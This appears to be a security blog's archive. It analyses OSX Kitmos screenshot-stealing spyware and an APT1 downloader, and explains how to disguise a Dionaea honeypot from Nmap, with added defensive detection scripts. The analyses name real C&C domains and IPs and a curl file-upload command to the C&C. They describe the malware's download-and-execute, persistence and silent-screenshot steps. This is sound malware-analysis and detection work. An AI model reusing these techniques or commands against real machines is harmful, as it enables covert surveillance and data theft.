Friday, May 24, 2013

OSX Kitmos : other binary, other C&C


On May 20th, Norman published a report about an Indian cyberattack infrastructure that they call "Hangover", after a string found in the path of a PDB file.
Their blog post also refers to the Oslo Freedom Forum attack that I wrote about in my previous article :
"Based on the sample and Command&Control domain mentioned in the F-Secure post, we can say quite conclusively that the Oslo Freedom Forum attack was performed through the same attack infrastructure. We also found another MachO executable apparently written by the same person (same Apple Developer ID), and using another domain in the Hangover infrastructure – torqspot.org."

As this domain is also present in another Mach-O binary that I have, I chose to take a quick look at it.

File information

SHA1 hash : b6a47d52de64af50a5a1415213e60dc1b076b4e7
File type : Mach-O executable i386
VirusTotal report : https://www.virustotal.com/en/file/a74196018b2854765333a8f798b0ae3f3b71c89ec9632188f07c71d055125cb2/analysis/

C&C information

This sample uses "torqspot.org" as its C&C domain name. Once again, whois reveals fake registrant information :

Domain ID:D168171472-LROR
Domain Name:TORQSPOT.ORG
Created On:16-Mar-2013 05:28:07 UTC
Last Updated On:16-May-2013 03:45:16 UTC
Expiration Date:16-Mar-2014 05:28:07 UTC
Sponsoring Registrar:PDR Ltd. d/b/a PublicDomainRegistry.com (R27-LROR)
Status:CLIENT TRANSFER PROHIBITED
Registrant ID:DI_25590875
Registrant Name:Melissa Leo
Registrant Street1:E-5 cecill street
Registrant Street2:Manchester
Registrant City:Manchester
Registrant State/Province:Manchester(Cityof)
Registrant Postal Code:M14LF
Registrant Country:GB
Registrant Phone:+044.7251868
Registrant Email:leo.melissa@mail.ru

The C&C is no longer responding.

IOC

All the logged messages can be used to identify a compromised Macintosh. For example, the following messages can be used as IOCs :

- "http://torqspot.org/App/MacADV/up.php?cname=%@&file=%@"
- "CONTACTS mreslt %@"
- "CONTACTS urlResponse  %d"
- "responseData: %@"
- "http://torqspot.org/App/MacADV/$hostname/$serverResponse"
- "/Applications"
- "End"
- "app path =%@"
- " exec path =%@"
- "file: %@"
- "connected to upload server %@"
- "Fail connected to upload server %@, begin in %d sec"
- "Try zip and upload for failed file, before."
- "ComputerName_UserName : %@"
- "Failed retry %@"
- "Retry %@"
- "New seesion"
- "search path from state.dat"
- "search path from root"
- "available paths: %@"
- "No found folder"
- "No found file"
- "Start searching"
- "%ld files found"

DNS resolution of "torqspot.org" and any HTTP request to this domain can also be used to identify a compromised computer on a network.
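To turn these logged format strings into something a host triage script can match, the "%@", "%d" and "%ld" placeholders have to become wildcards. The following Python script is an added example (not code from the original post or from the sample): it converts each format string to a regular expression and scans system log lines for them and for the C&C domain. The log lines are constructed, and the process name "MacADV" in them is an assumption taken from the URL path, not a name observed in the sample.

```python
import re

# Logged format strings taken from the IOC list above. "%@" is Cocoa's
# "any object" placeholder, "%d"/"%ld" are integers.
IOC_FORMATS = [
    "http://torqspot.org/App/MacADV/up.php?cname=%@&file=%@",
    "connected to upload server %@",
    "Fail connected to upload server %@, begin in %d sec",
    "ComputerName_UserName : %@",
    "New seesion",
    "%ld files found",
    "search path from state.dat",
]

C2_DOMAIN = "torqspot.org"

# Constructed syslog-style lines (not a real capture); the process name
# "MacADV" is an assumption, not something observed in the sample.
SAMPLE_LOG = """\
May 24 10:02:11 mbp kernel[0]: AppleUSBMultitouchDriver: got mt report
May 24 10:02:13 mbp MacADV[512]: ComputerName_UserName : mbp-john
May 24 10:02:14 mbp MacADV[512]: New seesion
May 24 10:02:15 mbp MacADV[512]: Fail connected to upload server http://torqspot.org/App/MacADV/up.php, begin in 30 sec
May 24 10:02:45 mbp MacADV[512]: 17 files found
May 24 10:03:00 mbp Safari[300]: loaded page http://example.com/
"""


def format_to_regex(fmt):
    """Turn an NSLog format string into a regex matching its rendered output."""
    out = []
    i = 0
    while i < len(fmt):
        if fmt.startswith("%@", i):
            out.append(".+?")          # any object description
            i += 2
        elif fmt.startswith("%ld", i):
            out.append(r"-?\d+")
            i += 3
        elif fmt.startswith("%d", i):
            out.append(r"-?\d+")
            i += 2
        elif fmt.startswith("%%", i):
            out.append("%")
            i += 2
        else:
            out.append(re.escape(fmt[i]))  # literal text, URL metacharacters included
            i += 1
    return re.compile("".join(out))


def scan_log(text):
    """Return [(line_no, reason)] for every line matching an IOC string or the C&C domain."""
    compiled = [(fmt, format_to_regex(fmt)) for fmt in IOC_FORMATS]
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        matched = [fmt for fmt, rx in compiled if rx.search(line)]
        if matched:
            # When several formats overlap (e.g. the "Fail connected ..." variant
            # contains "connected to upload server %@"), report the longest one.
            hits.append((n, "log string: " + max(matched, key=len)))
        if C2_DOMAIN in line.lower():
            hits.append((n, "C&C domain: " + C2_DOMAIN))
    return hits


if __name__ == "__main__":
    for line_no, reason in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {reason}")
```

On a real machine, feed the output of syslog (or the ASL database) to scan_log; the conversion keeps the literal parts of each message exact, so a benign line that merely mentions "files found" without a leading number is not flagged.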

Features

Many features and functions (coml, cop, runSystemCommand, ...) are similar to those of the previously analyzed binary. Only the new and interesting ones are detailed below.

macurl

- send a synchronous HTTP request to "http://torqspot.org/App/MacADV/up.php?cname=%@&file=%@" with the hostname as 1st argument and "no" as 2nd argument
- get data from the URL "http://torqspot.org/App/MacADV/$hostname/$serverResponse" with the dataWithContentsOfURL function, where $serverResponse is the response sent by the server to the previous request
- write the downloaded data to the file "/Applications/$serverResponse"
- execute the following command : "/usr/bin/ditto -x -k /Applications/$serverResponse /Applications/" to extract the PKZip archive "/Applications/$serverResponse" into "/Applications/"
- replace/add the ".app" extension on "/Applications/$serverResponse"
- if that path exists, run the executable (NSTask, setLaunchPath, launch)
- create the string "http://torqspot.org/App/MacDV/up.php?cname=%@&file=%@&res=%@" with the arguments $hostname, $serverResponse and "sucess" (with one 'c' :)
- send a request using that string (with the sendSynchronousRequest:returningResponse:error: method)
- log "file: %@" with the data returned by the server as argument

initFileBackup

- get the bundlePath and append "FileBackup.ini" to it
- use the "stringWithContentsOfFile:encoding:error:" function to read the content of the config file ("<bundlePath>/FileBackup.ini")
- if the file content is less than 10 characters long, jump to the end of the function
- extract the data between <URL> and </URL> and pass it as parameter to the setUrl function
- extract the data between <EXTENSION> and <EXTENSION> and use it to create an array of strings split on the ';' separator
- call setExtArray to initialize an array with the extensions stored in the "FileBackup.ini" file

before_start_

- get the bundlePath and append "state.dat" to it
- if that file exists, read its content and create an array of strings by splitting on the "#####" separator, then use the strings in that array as search paths
- if the file doesn't exist, the path is set to "/"
- call connectServer/upload of the ZipUpload class and run a command similar to "/usr/bin/curl -F upload=@ -F pc="

find_

Looks for files based on their extension.

batch_

Does some processing and then calls macurl.

deleteState_

Deletes the file "<bundlePath>/state.dat" if it exists.

saveState_

Saves a string array to "<bundlePath>/state.dat", separating the strings with "#####". This function is called by the find function, after which the malware terminates.


Refs

https://github.com/gdbinit/fixobjc/blob/master/fixobjc.idc
http://www.f-secure.com/weblog/archives/00002554.html
http://threatpost.com/new-mac-malware-discovered-on-attendee-computer-at-anti-surveillance-workshop/
http://blogs.norman.com/2013/security-research/the-hangover-report
https://www.botnets.fr/index.php/HangOver

Monday, May 20, 2013

OSX Kitmos analysis


On May 16th, Sean Sullivan published an article on the F-Secure blog about a new Mac OSX malware discovered by Jacob Appelbaum on the Mac of an African activist during an Oslo Freedom Forum workshop.

File information

SHA1 hash : 4395a2da164e09721700815ea3f816cddb9d676e

According to the Unix file command, this binary is a Mach-O executable containing both x86 and x64 code. The VirusTotal report of this binary can be found here. A quick look at the sample shows that it is not packed, obfuscated or encrypted.

C&C information

This sample contains two C&C URLs which, at the moment, both point to the same server at IP 50.116.28.24 (this differs from the F-Secure blog post, where the two domains resolved to different IP addresses). This IP address belongs to the Linode hosting company.

A whois on "securitytable.org" reveals this (fake) registrant information :

Domain ID:D168053198-LROR
Domain Name:SECURITYTABLE.ORG
Created On:04-Mar-2013 06:58:36 UTC
Last Updated On:16-May-2013 16:02:07 UTC
Expiration Date:04-Mar-2014 06:58:36 UTC
Sponsoring Registrar:PDR Ltd. d/b/a PublicDomainRegistry.com (R27-LROR)
Status:CLIENT TRANSFER PROHIBITED
Registrant ID:DI_26714386
Registrant Name:Christopher
Registrant Organization:N/A
Registrant Street1:DE-10387
Registrant Street2:Nairobi
Registrant Street3:
Registrant City:Nairobi
Registrant State/Province:Central
Registrant Postal Code:50563
Registrant Country:KE
Registrant Phone:+254.204973957
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:n.christopher@mail.ru

The whois information for the "docsforum.info" domain is similar.

IOC

All the logged messages can be used to identify a compromised Macintosh. For example, the following messages can be used as IOCs :
- " before ==%@"
- "path == %@"
- "path2===%@"
- "Hellooo"
- "Copy successful"
- "Upload response %@"
- "the path =%@"
- "path1 =%@"
- " Error - Statistics file upload failed: "%@""
- " the array value =%@"
- path to $HOME/MacApp
- date in this format : "yy-MM-dd-HH:mm:ss"
- "ComputerName_UserName : $hostname-$username"
- "Start file zip : %@"
- "Start file zip : %@"
- "Start file upload : %@"
- "finished zipping file"
- "finished uploading file"
- "file path==%@"

Network traffic can also be used to identify a compromised Mac on your network. A compromised Macintosh generates DNS requests for the "securitytable.org" and "docsforum.info" domains which, at the time I'm writing this blog post, resolve to 50.116.28.24. HTTP requests to "http://securitytable.org/lang.php" and "http://docsforum.info/lang.php" also reveal the compromise.
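An added example (not from the original post) of applying these network indicators to Zeek-style DNS and HTTP logs: it flags the C&C domains, the shared IP address and the lang.php endpoint, and reports the internal hosts involved. The log lines and their field subset are constructed and simplified, and the internal host addresses are made up.

```python
import ipaddress

# Indicators stated in the post.
C2_DOMAINS = {"securitytable.org", "docsforum.info"}
C2_IP = ipaddress.ip_address("50.116.28.24")
C2_PATH = "/lang.php"

# Constructed, simplified Zeek-style logs (tab separated; not real captures).
DNS_LOG = """\
ts\tid.orig_h\tquery\tanswers
1369044001.10\t192.168.1.50\twww.apple.com\t17.172.224.47
1369044002.20\t192.168.1.51\tsecuritytable.org\t50.116.28.24
1369044003.30\t192.168.1.52\tdocsforum.info\t50.116.28.24
1369044004.40\t192.168.1.50\tmail.example.net\t93.184.216.34
"""

HTTP_LOG = """\
ts\tid.orig_h\tid.resp_h\tmethod\thost\turi
1369044005.00\t192.168.1.51\t50.116.28.24\tPOST\tsecuritytable.org\t/lang.php
1369044006.00\t192.168.1.50\t93.184.216.34\tGET\texample.net\t/index.html
1369044007.00\t192.168.1.52\t50.116.28.24\tPOST\tdocsforum.info\t/lang.php
"""


def parse_tsv(text):
    """Header line gives the field names; every other line becomes a dict."""
    lines = [l for l in text.splitlines() if l]
    fields = lines[0].split("\t")
    return [dict(zip(fields, l.split("\t"))) for l in lines[1:]]


def suspicious_dns(text):
    """[(client, [reasons])] for DNS records touching the C&C domains or IP."""
    alerts = []
    for r in parse_tsv(text):
        reasons = []
        if r["query"].lower().rstrip(".") in C2_DOMAINS:
            reasons.append("query for C&C domain " + r["query"])
        if any(a.strip() == str(C2_IP) for a in r["answers"].split(",")):
            reasons.append("answer is C&C IP " + str(C2_IP))
        if reasons:
            alerts.append((r["id.orig_h"], reasons))
    return alerts


def suspicious_http(text):
    """[(client, [reasons])] for HTTP records hitting lang.php or the C&C IP."""
    alerts = []
    for r in parse_tsv(text):
        reasons = []
        if r["host"].lower() in C2_DOMAINS and r["uri"] == C2_PATH:
            reasons.append(f"{r['method']} {r['host']}{r['uri']}")
        if ipaddress.ip_address(r["id.resp_h"]) == C2_IP:
            reasons.append("connection to C&C IP")
        if reasons:
            alerts.append((r["id.orig_h"], reasons))
    return alerts


def compromised_hosts(dns_text, http_text):
    """Sorted list of internal hosts seen in either log with a C&C indicator."""
    hosts = {h for h, _ in suspicious_dns(dns_text)}
    hosts |= {h for h, _ in suspicious_http(http_text)}
    return sorted(hosts)


if __name__ == "__main__":
    for host, reasons in suspicious_dns(DNS_LOG) + suspicious_http(HTTP_LOG):
        print(host, "->", "; ".join(reasons))
    print("hosts to triage:", compromised_hosts(DNS_LOG, HTTP_LOG))
```

The IP check is kept separate from the domain check on purpose: when the domains are sinkholed or moved, the historical answer still ties a DNS record to the infrastructure, and a direct connection to the IP with no DNS lookup is still caught by the HTTP log.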

Features

sub_1E72

The function "sub_1E72" is responsible for the persistence of this malware : it adds the malware to the list of items started at session login.

- get the malware bundle path with NSBundle.bundlePath
- call LSSharedFileListCreate with kLSSharedFileListSessionLoginItems as list type to access the list of applications started when the user logs on
- call LSSharedFileListInsertItemURL to add the path of the malware bundle to that list

PS : The malware is added to the login items of the current user only; if the author wanted his program to start for all users on the system, he would have to pass the kLSSharedFileListGlobalLoginItems list type to LSSharedFileListCreate.

More information about this technique can be found here : http://cocoatutorial.grapewave.com/2010/02/creating-andor-removing-a-login-item/

cop

The first time the binary is executed, it copies itself to $HOME/<bundle_name>.app. Then the sample calls the "coml" function with the path of the new copy (or its current location, if this is not its first execution) as parameter.

The call to "coml" results in the execution of the following command : "/bin/sh -c open -a $HOME/<bundle_name>.app" (see coml & runSystemCommand below)

coml

Prepares the "open -a $arg" NSString for the "runSystemCommand" function.

runSystemCommand

Executes "/bin/sh -c $arg".


- create an NSArray via the arrayWithObjects method, used as the command line arguments of "sh" and containing "-c" and the runSystemCommand argument
- create an NSTask by calling the launchedTaskWithLaunchPath:arguments: method with "/bin/sh" and the previous NSArray as arguments

uploadRequestFinished

This function logs some information such as the response string received from the server and the path of the uploaded file. Then the uploaded file is removed from the file system with a call to removeItemAtPath.

uploadRequestFailed

Logs " Error - Statistics file upload failed: "%@"" where %@ is replaced by the string returned by localizedDescription.

sendRequestToServer

This function sends the hostname of the compromised Macintosh to the C&C server through an HTTP request to the http://docsforum.info/lang.php URL.

- create the "http://docsforum.info/lang.php" URL for an ASIFormDataRequest
- get the hostname via NSProcessInfo.processInfo.hostName
- call stringByReplacingOccurrencesOfString on the hostname value to replace '.' with 'p'
- log that new "hostname" string
- add the hostname value to the HTTP request as a POST field named "cname" (addPostValue function)
- perform the request with startAsynchronous

NB : I don't know whether this function is called anywhere, as I haven't found any xref to it.

getscreenshot

This function takes screenshots with the screencapture Mac OSX binary and saves them in the $HOME/MacApp directory. Screenshot names follow the format "yy-MM-dd-HH:mm:ss.png". This function is first called from the applicationDidFinishLaunching function. Screenshots are saved every 20 seconds.

- create the $HOME/MacApp path (with the NSHomeDirectory and stringWithFormat functions)
- this path is logged to the Apple System Log via NSLog
- use the shared file manager to access the file system (via NSFileManager.defaultManager)
- check whether the path exists (via fileExistsAtPath)
  - if it doesn't exist, create the directory with createDirectoryAtPath
- get a date string in the format "yy-MM-dd-HH:mm:ss" (via NSDate, NSDateFormatter, setDateFormat, stringFromDate)    // the date format differs from the F-Secure screenshot : here ':' is used where the F-Secure screenshot shows '/'
- the date is logged (NSLog)
- create the string $HOME/MacApp/yy-MM-dd-HH:mm:ss.png
- create an NSTask object to run a program as a subprocess
  - set the executable path to "/usr/sbin/screencapture" via setLaunchPath
  - arguments are passed to screencapture via setArguments :
    /usr/sbin/screencapture -x -T 20 $HOME/MacApp/yy-MM-dd-HH:mm:ss.png : take a screenshot without any sound after a 20 second delay and save it to the aforementioned path
  - the task is launched via the launch method
- finally, the uploadImage function is called

uploadImage

This function uploads the screenshots to "http://securitytable.org/lang.php"

- create an NSURL object from the string "http://securitytable.org/lang.php" and use it to create an ASIFormDataRequest
- create the MacApp directory path string and log it (as in the getscreenshot function)
- get the hostname of the computer through the "hostName" method of the NSProcessInfo object (the process information agent of the process)
- check that the path to the MacApp folder exists, and jump to the end of the function if not
- count the number of files/screenshots with contentsOfDirectoryAtPath and the count method of the returned string array
- log the number of files/screenshots
- get the first file of the list
- log " the array value =%@" where %@ is replaced by the name of the first file
- if ".DS_Store" is present, remove it from the file array
- loop over the files to upload each screenshot
  - create an NSData object with the content of the file/screenshot (via initWithContentsOfFile)
  - call the ASIFormDataRequest addPostValue function to set the $hostname data under the key "cname"
  - second call to addPostValue with the key "name" and the path of the screenshot as value
  - then call setData ("setData:withFileName:andContentType:forKey:") with
    key : userfile
    content type : image/png
    filename : path of the screenshot
    data : file content (the screenshot)
  - upload the file/screenshot
  - call the getscreenshot function
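An added example, not part of the original post, of a host triage check for the $HOME/MacApp artifact described in the getscreenshot and uploadImage functions: it looks for files named in the malware's "yy-MM-dd-HH:mm:ss.png" format and checks whether their timestamps are spaced about 20 seconds apart, which is the cadence described above. The fake home directory is built from constructed file names; the 2 second tolerance and the minimum of 3 files are arbitrary choices for this example.

```python
import os
import re
import tempfile
from datetime import datetime

# Screenshot name format used by the sample: yy-MM-dd-HH:mm:ss.png
SHOT_RE = re.compile(r"^(\d{2}-\d{2}-\d{2}-\d{2}:\d{2}:\d{2})\.png$")
DATE_FMT = "%y-%m-%d-%H:%M:%S"
EXPECTED_PERIOD = 20   # seconds between screenshots, as described in the post


def find_screenshots(directory):
    """Return sorted datetimes parsed from file names matching the malware's scheme."""
    stamps = []
    for name in os.listdir(directory):
        m = SHOT_RE.match(name)
        if m:
            stamps.append(datetime.strptime(m.group(1), DATE_FMT))
    return sorted(stamps)


def looks_periodic(directory, tolerance=2, min_files=3):
    """True if >= min_files screenshots exist and most gaps are ~EXPECTED_PERIOD apart."""
    stamps = find_screenshots(directory)
    if len(stamps) < min_files:
        return False
    gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
    periodic = sum(abs(g - EXPECTED_PERIOD) <= tolerance for g in gaps)
    return periodic >= len(gaps) / 2


def check_home(home):
    """Report on the $HOME/MacApp artifact the way a triage script would."""
    macapp = os.path.join(home, "MacApp")
    if not os.path.isdir(macapp):
        return {"present": False, "screenshots": 0, "periodic": False}
    return {
        "present": True,
        "screenshots": len(find_screenshots(macapp)),
        "periodic": looks_periodic(macapp),
    }


def build_constructed_home(with_macapp=True):
    """Create a temporary fake $HOME populated the way the malware would (constructed data)."""
    home = tempfile.mkdtemp(prefix="fakehome_")
    if with_macapp:
        macapp = os.path.join(home, "MacApp")
        os.mkdir(macapp)
        # Four screenshots roughly 20 s apart, plus two unrelated files.
        for name in ["13-05-16-14:02:11.png", "13-05-16-14:02:31.png",
                     "13-05-16-14:02:52.png", "13-05-16-14:03:12.png",
                     ".DS_Store", "notes.txt"]:
            open(os.path.join(macapp, name), "wb").close()
    return home


if __name__ == "__main__":
    print(check_home(build_constructed_home()))
    print(check_home(os.path.expanduser("~")))   # the real check on this machine
```

The cadence test matters more than the folder name: the directory and the file name format are trivial for a new build to change, while a process that writes a screenshot every 20 seconds leaves evenly spaced timestamps whatever it calls them.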

Summary

This Mac OSX malware is really simple. It has only a few features :
- start at user login
- take screenshot
- upload screenshot

In addition, it is not stealthy at all, as the screenshots are saved in the $HOME/MacApp directory of the infected user. No advanced malware techniques (packing, encryption, obfuscation) were seen in this sample.

Refs

https://github.com/gdbinit/fixobjc/blob/master/fixobjc.idc
http://www.f-secure.com/weblog/archives/00002554.html
http://threatpost.com/new-mac-malware-discovered-on-attendee-computer-at-anti-surveillance-workshop/

Monday, April 1, 2013

Analysis of an APT1 binary

In mid-February, Mandiant released a huge report about the cyber threat from the Chinese government. Some of the technical details were disclosed in Appendix C ("The Malware Arsenal") of their report.

Because of this APT buzz, I decided to take a look at one of the binaries mentioned in the APT1 report in order to get an idea of the level of this cyber threat.

After running a script on around 200 samples from APT1, I decided to analyse the binary which looked the strangest. The VT report can be found here.


According to PEiD, this binary is not packed, but it has four ".upx" sections and the OEP points to the last ".upx" section, which is not normal. The few functions in the import table, the few strings in the binary and the high entropy of all sections confirm the point : the binary is packed! I thought it interesting to take a look at this binary in order to understand, and maybe identify, the packer used, as PEiD failed to identify it.

Unpacking

The beginning of the packed code (in the last .upx section, at 0x8000) contains a lot of junk code. After these useless instructions, a loop modifies the code that follows it. The code after this loop retrieves the addresses of LoadLibrary and GetProcAddress through the import table of the loaded PE file (the ImportTableAddress field).

LoadLibrary is then used to load "kernel32.dll" and GetProcAddress to get the addresses of the following functions :
GetModuleHandleA, VirtualProtect, GetModuleFileNameA, CreateFileA, GlobalAlloc, GlobalFree, ReadFile, GetFileSize, CloseHandle, CreateSemaphoreA, ReleaseSemaphore, Sleep, WaitForSingleObject, CreateThread

Once these functions are resolved, SizeOfImage in PEB->PEB_LDR_DATA->InLoadOrderModuleList is set to 1000 (the previous value was 9000). Then VirtualProtect is called to change the protection of the binary's ImageBase to PAGE_READWRITE.

Then some strings are decoded in memory before being used, for example to load the "kernel32.dll" library again and resolve the addresses of VirtualProtect, VirtualAlloc and VirtualFree. As soon as a string has been used by LoadLibraryA or GetProcAddress, it is overwritten with zeros in memory. With this kind of protection, the process holds very little information in memory, so a dump of the running process is not very useful to an analyst.

Then the code jumps to the third section (.upx at 0x7000), which does similar work. The same goes for the second .upx section.

The first .upx section at RVA 0x5000 (but the last one executed, as the order is reversed) does similar work to the previous sections, but as it is the last packed stage, its actions are more interesting for the unpacked binary.

In fact, this last .upx section loads all the DLLs used by the final (unpacked) binary and resolves the addresses of all its functions :

kernel32.dll : CreateProcess, GetLongPathNameA, GetTempPathA, Sleep, CloseHandle, GetModuleHandleA, GetCommandLineA, GetModuleFileNameA, GetProcAddress, LoadLibraryA, ExitProcess

LZ32.dll : LZCopy, LZOpenFileA, LZClose

MSVCRT.dll : strstr, strncmp, atoi ...

ADVAPI32.dll : RegSetValueExA, RegCreateKeyExA, RegCloseKey

Then the code jumps into the .text section, at the real OEP.

This packer uses several tricks to annoy the disassembler and the analyst, such as jumps into the middle of an instruction, "push eax; retn", always-true comparisons ... but nothing to detect the presence of a debugger or a VM.


Malware features

After unpacking, this binary turns out to be a simple downloader. The binary tries to confuse IDA with lots of "JZ/JNZ" jump pairs; nearly all jumps use this trick.

IDA confused

Disassembly fixed

The first function called by the unpacked code resolves the addresses of the network functions. The "wininet.dll" library is loaded at runtime with LoadLibrary, then the addresses of InternetOpenUrlA, InternetOpenA, InternetCloseHandle and InternetReadFile are resolved with GetProcAddress. The address of URLDownloadToFileA from "urlmon.dll" is resolved the same way.

The second function ensures the malware's persistence across reboots. To run after a reboot, this malware adds an entry to the registry :

[HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"McUpdate"="path_to_this_binary"

The key and value names are not stored in clear text in the file but are encoded with a XOR algorithm. The following Python script decodes all the encoded strings used in this binary :

Then the malware contacts its C&C to get an order. The URL is encoded with the aforementioned algorithm; once decoded it is http://216.15.210.68/197.1.16.3_7.html. The User-Agent used to connect to the C&C, also decoded at runtime, is "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)". If the malware can't contact the C&C, it waits 10 minutes before retrying. After 3 failures to get a command from the C&C, the binary ends its execution.

Commands on the C&C server sit between the "<!-- DOCHTML" and "-->" HTML comment markers. These two markers, like the commands below, are also stored encoded in the binary. The command can be one of the following :
- Ausov : exit the program
- Author X : wait X * 10 minutes
- http://url : URL of another binary to download and execute

When the last kind of command is received from the C&C, the file pointed to by the URL is downloaded to the temporary folder with the URLDownloadToFile function. As the downloaded file may be compressed with the Lempel-Ziv algorithm, the malware opens it with LZOpenFile. Another file is created with nearly the same path as the first one, with a ".exe" extension appended. Then the content of the first file (the downloaded one) is copied (and decompressed if necessary) into the second one with the LZCopy function.

After that, the copied (and uncompressed) file is executed with CreateProcessA.
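An added example (not the post's script, which isn't reproduced here, and not code from the sample) that parses the C&C page format just described and simulates the polling logic: the kind of parser one writes for a sandbox C&C emulator or to test a detection rule. The HTML pages are constructed, the 203.0.113.7 URL is a documentation address, and whether a successful poll resets the failure counter is not stated in the post, so this simulation does not reset it.

```python
import re
from urllib.parse import urlsplit

# Command delimiters and timings as described in the post.
CMD_OPEN, CMD_CLOSE = "<!-- DOCHTML", "-->"
SLEEP_UNIT = 10 * 60      # "Author X" waits X * 10 minutes
RETRY_DELAY = 10 * 60     # wait before retrying an unreachable C&C
MAX_FAILURES = 3          # give up after this many failed polls

# Constructed C&C responses; None stands for an unreachable server.
PAGES = [
    "<html><body>Welcome</body><!-- DOCHTML Author 3 --></html>",
    None,
    "<html><!-- DOCHTML http://203.0.113.7/update.dat --></html>",
    "<html><!-- DOCHTML Ausov --></html>",
    "<html><!-- DOCHTML Author 1 --></html>",   # never reached
]


def extract_command(html):
    """Return the text hidden between the markers, or None if the page carries none."""
    start = html.find(CMD_OPEN)
    if start < 0:
        return None
    end = html.find(CMD_CLOSE, start + len(CMD_OPEN))
    if end < 0:
        return None
    return html[start + len(CMD_OPEN):end].strip()


def classify(command):
    """Map a raw command to one of the three actions the downloader understands."""
    if command is None:
        return ("none", None)
    if command == "Ausov":
        return ("exit", None)
    m = re.fullmatch(r"Author\s+(\d+)", command)
    if m:
        return ("sleep", int(m.group(1)) * SLEEP_UNIT)
    if urlsplit(command).scheme in ("http", "https"):
        return ("download", command)
    return ("unknown", command)


def run_beacon_loop(responses):
    """Walk a sequence of responses and return the actions the downloader would take.
    Stops after MAX_FAILURES unreachable polls or an exit command. The failure
    counter is not reset on success (assumption, the post does not say)."""
    actions, failures = [], 0
    for page in responses:
        if page is None:
            failures += 1
            actions.append(("retry_in", RETRY_DELAY))
            if failures >= MAX_FAILURES:
                actions.append(("exit", "c2 unreachable"))
                break
            continue
        kind, arg = classify(extract_command(page))
        actions.append((kind, arg))
        if kind == "exit":
            break
    return actions


if __name__ == "__main__":
    for action in run_beacon_loop(PAGES):
        print(action)
```

A proxy rule can use the same two facts this parser relies on: a page fetched with the MSIE 6.0 User-Agent above that carries a "<!-- DOCHTML" comment is not something a real browser session produces.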


After analysis, the aim of this malware is simple : download and execute (more advanced?) binaries on the victim's computer. This malware seems to belong to the WEBC2-AUSOV family defined by Mandiant, as "Ausov" is one of this sample's commands.

I have not been able to identify the packer used. So if you recognize it, feedback will be welcome ;-)


Sunday, June 10, 2012

Make Dionaea stealthier for fun and no profit

I'm in my "honeypot playing period" and I've tried to scan my Dionaea with Nmap, which of course detects lots of listening ports but, more annoyingly, recent versions of Nmap are able to see that some services are provided by Dionaea ...

So if you want your honeypot to be stealthier, you can apply some tricks. Before modifying the behaviour of the Dionaea services, you have to know how Nmap's service fingerprinting works (I will only talk about Nmap because it's the most used port scanner; it's up to you to try with others).

To discover the name and version of a service, Nmap uses Perl Compatible Regular Expressions. All these regexps are stored in /usr/share/nmap/nmap-service-probes (the path can change according to the OS). If you want to understand the syntax of the nmap-service-probes file, I recommend you read this. Below are some probes extracted from this file :

So if we want to hide our Dionaea honeypot from Nmap users, we have to modify Dionaea's behaviour so that it no longer matches Nmap's probes. First, list all the Dionaea signatures in this file :

[steeve@omega ~]$ cat /usr/share/nmap/nmap-service-probes | grep Dionaea

We can see that Nmap is able to detect "only" 4 services offered by Dionaea : FTP, HTTP, MSSQL and SMB. I will show you how we can deceive Nmap by modifying a few files in Dionaea. I won't show you how to tweak the MSSQL service because I haven't dug deeper and this service looks a bit more complicated ... (If you have a solution, you can send me a mail or share it in the comments :-)

First, if we look at the FTP probe, we can see that Nmap only checks the connection banner. So we just have to change it, and Nmap will fail to retrieve the service name and version. Of course we could use any banner, but the best thing to do (in my opinion) is to mimic a real FTP server. Shodan is a great tool for learning what real FTP servers look like; check this link. I chose the MS FTP banner : "Microsoft FTP Service".

So we have to edit the FTP Python module located at /opt/dionaea/lib/dionaea/python/dionaea/ftp.py and replace "Welcome to the ftp service" with the banner of your choice :
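To check a candidate banner against nmap-service-probes before restarting Dionaea, the following added Python script (not part of the original post or of Dionaea) parses the file's "match" lines and runs them the way Nmap does, so you can see what Nmap would report for the old banner and for the new one. The probe lines embedded below are constructed in the file's syntax; the real entries for Dionaea and Microsoft FTP may differ, so point parse_probes at your own copy of the file.

```python
import re

# Constructed excerpt in nmap-service-probes syntax (not copied from the real file):
#   match <service> m<delim>regex<delim>[flags] [p/product/] [v/version/] ...
PROBE_FILE = r"""
# Comments and Probe lines are ignored by the parser below.
Probe NULL q||
match ftp m|^220 Welcome to the ftp service\r\n| p/Dionaea honeypot ftpd/
match ftp m|^220 Microsoft FTP Service\r\n| p/Microsoft ftpd/
match ftp m|^220.*ProFTPD (\d[-.\w]+) Server| p/ProFTPD/ v/$1/
"""

# "match" or "softmatch", service name, a one-character delimiter, the regex,
# the same delimiter again, optional i/s flags, then the remaining fields.
MATCH_RE = re.compile(r"^(match|softmatch)\s+(\S+)\s+m(.)(.*?)\3([is]*)\s*(.*)$")
# p/product/ v/version/ i/info/ h/hostname/ o/os/ d/device/
FIELD_RE = re.compile(r"([pvihod])/(.*?)/")


def parse_probes(text):
    """Return the list of signatures found in nmap-service-probes text."""
    sigs = []
    for line in text.splitlines():
        m = MATCH_RE.match(line)
        if not m:
            continue
        kind, service, _delim, pattern, flags, rest = m.groups()
        re_flags = 0
        if "i" in flags:
            re_flags |= re.IGNORECASE
        if "s" in flags:
            re_flags |= re.DOTALL
        fields = dict(FIELD_RE.findall(rest))
        sigs.append({
            "kind": kind,
            "service": service,
            "regex": re.compile(pattern, re_flags),
            "product": fields.get("p"),
            "version": fields.get("v"),
        })
    return sigs


def fingerprint(banner, sigs):
    """(product, version) for the first signature matching the banner, or None.
    $1, $2 ... in the version field are replaced by the regex capture groups."""
    for s in sigs:
        m = s["regex"].search(banner)
        if not m:
            continue
        version = s["version"]
        if version:
            for i, group in enumerate(m.groups(), 1):
                version = version.replace(f"${i}", group or "")
        return (s["product"], version)
    return None


if __name__ == "__main__":
    sigs = parse_probes(PROBE_FILE)
    for banner in ["220 Welcome to the ftp service\r\n",
                   "220 Microsoft FTP Service\r\n",
                   "220 ProFTPD 1.3.3 Server ready.\r\n",
                   "220 Custom banner\r\n"]:
        print(repr(banner), "->", fingerprint(banner, sigs))
```

Two things the output makes visible: a banner nobody has a signature for yields no match at all, which is itself a hint that something odd is listening, whereas a banner that matches a real server's signature makes Nmap report that server. The second is what the post is after.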

